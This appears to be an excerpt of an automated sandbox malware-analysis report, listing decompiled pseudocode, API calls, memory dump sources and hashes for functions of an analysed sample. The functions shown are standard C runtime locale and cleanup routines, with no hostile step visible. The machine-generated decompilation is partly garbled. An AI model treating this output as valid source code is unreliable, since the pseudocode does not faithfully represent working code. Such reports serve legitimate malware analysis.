                                                            • Part of subcall function 009B4CB1: __invoke_watson.LIBCMT ref: 009B4E84
                                                          • ___getlocaleinfo.LIBCMT ref: 009B92F1
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9308
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9322
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9339
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9350
                                                          • ___getlocaleinfo.LIBCMT ref: 009B936A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9387
                                                          • ___getlocaleinfo.LIBCMT ref: 009B939E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93B5
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93CC
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93E6
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93FD
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9414
                                                          • ___getlocaleinfo.LIBCMT ref: 009B942B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9445
                                                          • ___getlocaleinfo.LIBCMT ref: 009B945C
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9473
                                                          • ___getlocaleinfo.LIBCMT ref: 009B948A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94A4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94BB
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94D2
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94E9
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9503
                                                          • ___getlocaleinfo.LIBCMT ref: 009B951A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9531
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9548
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9562
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9579
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9590
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95A7
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95C1
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95D8
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95EF
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9606
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9620
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9637
                                                          • ___getlocaleinfo.LIBCMT ref: 009B964E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9665
                                                          • ___getlocaleinfo.LIBCMT ref: 009B967F
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9696
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96AD
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96C4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96DE
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96F5
                                                          • ___getlocaleinfo.LIBCMT ref: 009B970C
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9723
                                                          • ___getlocaleinfo.LIBCMT ref: 009B973D
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9754
                                                          • ___getlocaleinfo.LIBCMT ref: 009B976B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9785
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ___getlocaleinfo$InfoLocale___crt__calloc_crt_free$ErrorLast__invoke_watson
                                                          • String ID:
                                                          • API String ID: 2187842456-0
                                                          • Opcode ID: 8375b925f5075488876cc9cab56261634bb77b2d62e2c670fe3a5a182e7b013c
                                                          • Instruction ID: 6e8214fe5e7f4c6d73932429b3962ef00e9e2aa88c85c0fbdba6f399621dcba6
                                                          • Opcode Fuzzy Hash: 8375b925f5075488876cc9cab56261634bb77b2d62e2c670fe3a5a182e7b013c
                                                          • Instruction Fuzzy Hash: 71F1D9B7E4120D7AE72697F0CD86FEBB7ACA704B40F004622F755E7082FAB4665457A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A2B81 Relevance: 40.8, APIs: 27, Instructions: 258COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 86%
                                                          			E009A2B81(intOrPtr* __eax, void* __edx, void* __edi, void* __esi) {
				void* __ebx;
				signed int _t138;
				void* _t139;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				void* _t174;
				void* _t176;

				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__eax + 0x6a)) =  *((intOrPtr*)(__eax + 0x6a)) + __edx;
				_t146 = _t176 + 1;
				_push(_t139);
				_push(2);
				_push(_t174 - 8);
				_t147 = _t146 | E009B4CB1(_t139, __edi, _t146);
				_t148 = _t147 | E009B4CB1(_t139, __edi, _t147, _t174 - 8, 2, _t139, 0x47, __edi + 0xf8);
				_t149 = _t148 | E009B4CB1(_t139, __edi, _t148, _t174 - 8, 2, _t139, 0x48, __edi + 0xfc);
				_t150 = _t149 | E009B4CB1(_t139, __edi, _t149, _t174 - 8, 2, _t139, 0x49, __edi + 0x100);
				_t151 = _t150 | E009B4CB1(_t139, __edi, _t150, _t174 - 8, 2, _t139, 0x4a, __edi + 0x104);
				_t152 = _t151 | E009B4CB1(_t139, __edi, _t151, _t174 - 8, 2, _t139, 0x4b, __edi + 0x108);
				_t153 = _t152 | E009B4CB1(_t139, __edi, _t152, _t174 - 8, 2, _t139, 0x4c, __edi + 0x10c);
				_t154 = _t153 | E009B4CB1(_t139, __edi, _t153, _t174 - 8, 2, _t139, 0x4d, __edi + 0x110);
				_t155 = _t154 | E009B4CB1(_t139, __edi, _t154, _t174 - 8, 2, _t139, 0x4e, __edi + 0x114);
				_t156 = _t155 | E009B4CB1(_t139, __edi, _t155, _t174 - 8, 2, _t139, 0x4f, __edi + 0x118);
				_t157 = _t156 | E009B4CB1(_t139, __edi, _t156, _t174 - 8, 2, _t139, 0x38, __edi + 0x11c);
				_t158 = _t157 | E009B4CB1(_t139, __edi, _t157, _t174 - 8, 2, _t139, 0x39, __edi + 0x120);
				_t159 = _t158 | E009B4CB1(_t139, __edi, _t158, _t174 - 8, 2, _t139, 0x3a, __edi + 0x124);
				_t160 = _t159 | E009B4CB1(_t139, __edi, _t159, _t174 - 8, 2, _t139, 0x3b, __edi + 0x128);
				_t161 = _t160 | E009B4CB1(_t139, __edi, _t160, _t174 - 8, 2, _t139, 0x3c, __edi + 0x12c);
				_t162 = _t161 | E009B4CB1(_t139, __edi, _t161, _t174 - 8, 2, _t139, 0x3d, __edi + 0x130);
				_t163 = _t162 | E009B4CB1(_t139, __edi, _t162, _t174 - 8, 2, _t139, 0x3e, __edi + 0x134);
				_t164 = _t163 | E009B4CB1(_t139, __edi, _t163, _t174 - 8, 2, _t139, 0x3f, __edi + 0x138);
				_t165 = _t164 | E009B4CB1(_t139, __edi, _t164, _t174 - 8, 2, _t139, 0x40, __edi + 0x13c);
				_t166 = _t165 | E009B4CB1(_t139, __edi, _t165, _t174 - 8, 2, _t139, 0x41, __edi + 0x140);
				_t167 = _t166 | E009B4CB1(_t139, __edi, _t166, _t174 - 8, 2, _t139, 0x42, __edi + 0x144);
				_t168 = _t167 | E009B4CB1(_t139, __edi, _t167, _t174 - 8, 2, _t139, 0x43, __edi + 0x148);
				_t169 = _t168 | E009B4CB1(_t139, __edi, _t168, _t174 - 8, 2, _t139, 0x28, __edi + 0x14c);
				_t170 = _t169 | E009B4CB1(_t139, __edi, _t169, _t174 - 8, 2, _t139, 0x29, __edi + 0x150);
				_t171 = _t170 | E009B4CB1(_t139, __edi, _t170, _t174 - 8, 2, _t139, 0x1f, __edi + 0x154);
				_t172 = _t171 | E009B4CB1(_t139, __edi, _t171, _t174 - 8, 2, _t139, 0x20, __edi + 0x158);
				_t138 = E009B4CB1(_t139, __edi, _t172, _t174 - 8, 2, _t139, 0x1003, __edi + 0x15c) | _t172;
				return _t138;
			}



































                                                          0x009b950d
                                                          0x009b950f
                                                          0x009b9512
                                                          0x009b9513
                                                          0x009b9517
                                                          0x009b9519
                                                          0x009b951f
                                                          0x009b9536
                                                          0x009b9550
                                                          0x009b9567
                                                          0x009b957e
                                                          0x009b9595
                                                          0x009b95af
                                                          0x009b95c6
                                                          0x009b95dd
                                                          0x009b95f4
                                                          0x009b960e
                                                          0x009b9625
                                                          0x009b963c
                                                          0x009b9653
                                                          0x009b966d
                                                          0x009b9684
                                                          0x009b969b
                                                          0x009b96b2
                                                          0x009b96cc
                                                          0x009b96e3
                                                          0x009b96fa
                                                          0x009b9711
                                                          0x009b972b
                                                          0x009b9742
                                                          0x009b9759
                                                          0x009b9770
                                                          0x009b978d
                                                          0x009b9795

                                                          APIs
                                                          • ___getlocaleinfo.LIBCMT ref: 009B951A
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D03
                                                            • Part of subcall function 009B4CB1: GetLastError.KERNEL32 ref: 009B4D15
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D35
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D4A
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D77
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D8C
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DA4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9531
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DE4
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4E0E
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4E34
                                                            • Part of subcall function 009B4CB1: __invoke_watson.LIBCMT ref: 009B4E84
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9548
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9562
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9579
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9590
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95A7
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95C1
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95D8
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95EF
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9606
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9620
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9637
                                                          • ___getlocaleinfo.LIBCMT ref: 009B964E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9665
                                                          • ___getlocaleinfo.LIBCMT ref: 009B967F
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9696
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96AD
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96C4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96DE
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96F5
                                                          • ___getlocaleinfo.LIBCMT ref: 009B970C
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9723
                                                          • ___getlocaleinfo.LIBCMT ref: 009B973D
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9754
                                                          • ___getlocaleinfo.LIBCMT ref: 009B976B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9785
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ___getlocaleinfo$InfoLocale___crt__calloc_crt_free$ErrorLast__invoke_watson
                                                          • String ID:
                                                          • API String ID: 2187842456-0
                                                          • Opcode ID: d5d5399395cc1563ab7bb71699b5c5c8bda82732998071ff11530a5c4ee30b2e
                                                          • Instruction ID: 095aece78304d225d391e1eee354350efbf9141cb11fa942de95b1040b824b20
                                                          • Opcode Fuzzy Hash: d5d5399395cc1563ab7bb71699b5c5c8bda82732998071ff11530a5c4ee30b2e
                                                          • Instruction Fuzzy Hash: 9381ECB7E4110C7AE72697F08D47FEABBACA704B40F404622F755E7082FAB4A65457A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A2703 Relevance: 36.2, APIs: 24, Instructions: 228COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 89%
                                                          			E009A2703(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _t153;
				void* _t167;
				void* _t180;
				void* _t187;
				char* _t192;
				intOrPtr* _t195;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				intOrPtr* _t218;
				char* _t220;
				void* _t221;
				void* _t222;

				_t180 = __ebx;
				_t222 = _t221 + 1;
				asm("in al, dx");
				_push(1);
				_t198 = E009B4CB1(__ebx, __edi, __esi);
				_t199 = _t198 | E009B4CB1(__ebx, __edi, _t198, _t222 - 0x14, 1, __edi, 0x14,  *((intOrPtr*)(_t222 + 8)) + 0x10);
				_t200 = _t199 | E009B4CB1(__ebx, __edi, _t199, _t222 - 0x14, 1, __edi, 0x16,  *((intOrPtr*)(_t222 + 8)) + 0x14);
				_t201 = _t200 | E009B4CB1(__ebx, __edi, _t200, _t222 - 0x14, 1, __edi, 0x17,  *((intOrPtr*)(_t222 + 8)) + 0x18);
				 *((intOrPtr*)(_t222 - 0xc)) =  *((intOrPtr*)(_t222 + 8)) + 0x1c;
				_t202 = _t201 | E009B4CB1(__ebx, __edi, _t201, _t222 - 0x14, 1, __edi, 0x18,  *((intOrPtr*)(_t222 + 8)) + 0x1c);
				_t203 = _t202 | E009B4CB1(__ebx, __edi, _t202, _t222 - 0x14, 1, __edi, 0x50,  *((intOrPtr*)(_t222 + 8)) + 0x20);
				_t204 = _t203 | E009B4CB1(__ebx, __edi, _t203, _t222 - 0x14, 1, __edi, 0x51,  *((intOrPtr*)(_t222 + 8)) + 0x24);
				_t205 = _t204 | E009B4CB1(__ebx, __edi, _t204, _t222 - 0x14, 0, __edi, 0x1a,  *((intOrPtr*)(_t222 + 8)) + 0x28);
				_t206 = _t205 | E009B4CB1(__ebx, __edi, _t205, _t222 - 0x14, 0, __edi, 0x19,  *((intOrPtr*)(_t222 + 8)) + 0x29);
				_t207 = _t206 | E009B4CB1(__ebx, __edi, _t206, _t222 - 0x14, 0, __edi, 0x54,  *((intOrPtr*)(_t222 + 8)) + 0x2a);
				_t208 = _t207 | E009B4CB1(__ebx, __edi, _t207, _t222 - 0x14, 0, __edi, 0x55,  *((intOrPtr*)(_t222 + 8)) + 0x2b);
				_t209 = _t208 | E009B4CB1(__ebx, __edi, _t208, _t222 - 0x14, 0, __edi, 0x56,  *((intOrPtr*)(_t222 + 8)) + 0x2c);
				_t210 = _t209 | E009B4CB1(__ebx, __edi, _t209, _t222 - 0x14, 0, __edi, 0x57,  *((intOrPtr*)(_t222 + 8)) + 0x2d);
				_t211 = _t210 | E009B4CB1(__ebx, __edi, _t210, _t222 - 0x14, 0, __edi, 0x52,  *((intOrPtr*)(_t222 + 8)) + 0x2e);
				_t212 = _t211 | E009B4CB1(__ebx, __edi, _t211, _t222 - 0x14, 0, __edi, 0x53,  *((intOrPtr*)(_t222 + 8)) + 0x2f);
				_t213 = _t212 | E009B4CB1(__ebx, __edi, _t212, _t222 - 0x14, 2, __edi, 0x15,  *((intOrPtr*)(_t222 + 8)) + 0x38);
				_t214 = _t213 | E009B4CB1(__ebx, __edi, _t213, _t222 - 0x14, 2, __edi, 0x14,  *((intOrPtr*)(_t222 + 8)) + 0x3c);
				_t215 = _t214 | E009B4CB1(__ebx, __edi, _t214, _t222 - 0x14, 2, __edi, 0x16,  *((intOrPtr*)(_t222 + 8)) + 0x40);
				_t216 = _t215 | E009B4CB1(__ebx, __edi, _t215, _t222 - 0x14, 2, __edi, 0x17,  *((intOrPtr*)(_t222 + 8)) + 0x44);
				_t217 = _t216 | E009B4CB1(__ebx, __edi, _t216, _t222 - 0x14, 2, __edi, 0x50,  *((intOrPtr*)(_t222 + 8)) + 0x48);
				if((E009B4CB1(__ebx, __edi, _t217, _t222 - 0x14, 2, __edi, 0x51,  *((intOrPtr*)(_t222 + 8)) + 0x4c) | _t217) == 0) {
					_t192 =  *((intOrPtr*)( *((intOrPtr*)(_t222 - 0xc))));
					while( *_t192 != 0) {
						_t153 =  *_t192;
						if(_t153 < 0x30 || _t153 > 0x39) {
							if(_t153 != 0x3b) {
								goto L8;
							} else {
								_t220 = _t192;
								do {
									 *_t220 =  *((intOrPtr*)(_t220 + 1));
									_t220 = _t220 + 1;
								} while ( *_t220 != 0);
								continue;
							}
							L19:
							if( *((intOrPtr*)(_t180 + 0x78)) != 0) {
								asm("lock xadd [eax], ecx");
								if(_t187 == 1) {
									E009B2248( *((intOrPtr*)(_t180 + 0x84)));
									E009B2248( *((intOrPtr*)(_t180 + 0x78)));
								}
							}
							 *((intOrPtr*)(_t180 + 0x78)) =  *((intOrPtr*)(_t222 - 4));
							_t167 = 0;
							 *((intOrPtr*)(_t180 + 0x80)) = _t195;
							 *((intOrPtr*)(_t180 + 0x84)) = _t218;
							goto L23;
						} else {
							 *_t192 = _t153 - 0x30;
							L8:
							_t192 = _t192 + 1;
						}
					}
					_t218 =  *((intOrPtr*)(_t222 + 8));
					_t195 =  *((intOrPtr*)(_t222 - 8));
					 *_t218 =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84))));
					 *((intOrPtr*)(_t218 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 4));
					 *((intOrPtr*)(_t218 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 8));
					 *((intOrPtr*)(_t218 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 0x30));
					 *((intOrPtr*)(_t218 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 0x34));
					 *((intOrPtr*)( *((intOrPtr*)(_t222 - 4)))) = 1;
					if(_t195 != 0) {
						 *_t195 = 1;
					}
					_t187 = 0xffffffffffffffff;
					if( *((intOrPtr*)(_t180 + 0x80)) != 0) {
						asm("lock xadd [edx], eax");
					}
					goto L19;
				} else {
					E009B842D( *((intOrPtr*)(_t222 + 8)));
					E009B2248( *((intOrPtr*)(_t222 + 8)));
					E009B2248( *((intOrPtr*)(_t222 - 4)));
					E009B2248( *((intOrPtr*)(_t222 - 8)));
					_t167 = 1;
				}
				L23:
				return _t167;
			}

































                                                          0x009a2703
                                                          0x009b85d4
                                                          0x009b85d5
                                                          0x009b85d6
                                                          0x009b85e1
                                                          0x009b85f5
                                                          0x009b860c
                                                          0x009b8626
                                                          0x009b862e
                                                          0x009b8640
                                                          0x009b8657
                                                          0x009b866e
                                                          0x009b8688
                                                          0x009b869f
                                                          0x009b86b6
                                                          0x009b86cd
                                                          0x009b86e7
                                                          0x009b86fe
                                                          0x009b8715
                                                          0x009b872c
                                                          0x009b8746
                                                          0x009b875d
                                                          0x009b8774
                                                          0x009b878b
                                                          0x009b87a5
                                                          0x009b87c1
                                                          0x009b87ef
                                                          0x009b8802
                                                          0x009b87f3
                                                          0x009b87f7
                                                          0x009b880b
                                                          0x00000000
                                                          0x009b880d
                                                          0x009b880d
                                                          0x009b880f
                                                          0x009b8812
                                                          0x009b8814
                                                          0x009b8817
                                                          0x00000000
                                                          0x009b881c
                                                          0x009b888c
                                                          0x009b8891
                                                          0x009b8893
                                                          0x009b8898
                                                          0x009b88a0
                                                          0x009b88a8
                                                          0x009b88ae
                                                          0x009b8898
                                                          0x009b88b2
                                                          0x009b88b5
                                                          0x009b88b7
                                                          0x009b88bd
                                                          0x00000000
                                                          0x009b87fd
                                                          0x009b87ff
                                                          0x009b8801
                                                          0x009b8801
                                                          0x009b8801
                                                          0x009b87f7
                                                          0x009b8833
                                                          0x009b8837
                                                          0x009b883c
                                                          0x009b8847
                                                          0x009b8853
                                                          0x009b885f
                                                          0x009b886b
                                                          0x009b8871
                                                          0x009b8875
                                                          0x009b8877
                                                          0x009b8877
                                                          0x009b887f
                                                          0x009b8884
                                                          0x009b8888
                                                          0x009b8888
                                                          0x00000000
                                                          0x009b87c3
                                                          0x009b87c7
                                                          0x009b87cd
                                                          0x009b87d6
                                                          0x009b87df
                                                          0x009b8575
                                                          0x009b8575
                                                          0x009b88c3
                                                          0x009b88c9

                                                          APIs
                                                          • ___getlocaleinfo.LIBCMT ref: 009B85D9
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D03
                                                            • Part of subcall function 009B4CB1: GetLastError.KERNEL32 ref: 009B4D15
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D35
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D4A
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D77
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D8C
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DA4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B85F0
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DE4
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4E0E
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4E34
                                                            • Part of subcall function 009B4CB1: __invoke_watson.LIBCMT ref: 009B4E84
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8607
                                                          • ___getlocaleinfo.LIBCMT ref: 009B861E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B863B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8652
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8669
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8680
                                                          • ___getlocaleinfo.LIBCMT ref: 009B869A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B86B1
                                                          • ___getlocaleinfo.LIBCMT ref: 009B86C8
                                                          • ___getlocaleinfo.LIBCMT ref: 009B86DF
                                                          • ___getlocaleinfo.LIBCMT ref: 009B86F9
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8710
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8727
                                                          • ___getlocaleinfo.LIBCMT ref: 009B873E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8758
                                                          • ___getlocaleinfo.LIBCMT ref: 009B876F
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8786
                                                          • ___getlocaleinfo.LIBCMT ref: 009B879D
                                                          • ___getlocaleinfo.LIBCMT ref: 009B87B7
                                                          • _free.LIBCMT ref: 009B87CD
                                                            • Part of subcall function 009B2248: HeapFree.KERNEL32(00000000,00000000), ref: 009B225C
                                                            • Part of subcall function 009B2248: GetLastError.KERNEL32(00000000,?,009B060D,00000000,?,009CE000), ref: 009B226E
                                                          • _free.LIBCMT ref: 009B87D6
                                                          • _free.LIBCMT ref: 009B87DF
                                                          • _free.LIBCMT ref: 009B88A0
                                                          • _free.LIBCMT ref: 009B88A8
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B8448
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B845A
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B846C
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B847E
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B8490
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84A2
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84B4
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84C6
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84D8
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84EA
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84FC
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B850E
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B8520
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ___getlocaleinfo_free$InfoLocale___crt__calloc_crt$ErrorLast$FreeHeap__invoke_watson
                                                          • String ID:
                                                          • API String ID: 129311744-0
                                                          • Opcode ID: 7b9dc03d4c7b8376b1ca75be350bb18c838d1f55d8d98acc1045b3e465f79b47
                                                          • Instruction ID: ec7e1f363432fbeafe564d2c9f603ed1537927bb5a0de419b043ff16894b443a
                                                          • Opcode Fuzzy Hash: 7b9dc03d4c7b8376b1ca75be350bb18c838d1f55d8d98acc1045b3e465f79b47
                                                          • Instruction Fuzzy Hash: 866113B2E402087AEB30DBA8CD46FEF7BEC9B48B85F144510FA44FB182D5A4DA509675
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A320D Relevance: 35.1, APIs: 14, Strings: 6, Instructions: 71libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E009A320D(void* __eax, void* __ebx, void* __ecx) {
				void* _t57;

				_t57 = __ebx;
				asm("pushfd");
				 *((intOrPtr*)(__ebx + 0x75ff85f8)) =  *((intOrPtr*)(__ebx + 0x75ff85f8)) + __ecx;
				GetLastError();
			}




                                                          0x009a320d
                                                          0x009b5837
                                                          0x009b5838
                                                          0x009b583e

                                                          APIs
                                                          • GetLastError.KERNEL32 ref: 009B583E
                                                          • LoadLibraryExW.KERNEL32(USER32.DLL,00000000,00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B5855
                                                          • GetProcAddress.KERNEL32(00000000,MessageBoxW,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B586B
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B587A
                                                          • GetProcAddress.KERNEL32(00000000,GetActiveWindow,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B5887
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B588E
                                                          • GetProcAddress.KERNEL32(00000000,GetLastActivePopup,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B589B
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58A2
                                                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58AF
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58B6
                                                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58C7
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58CE
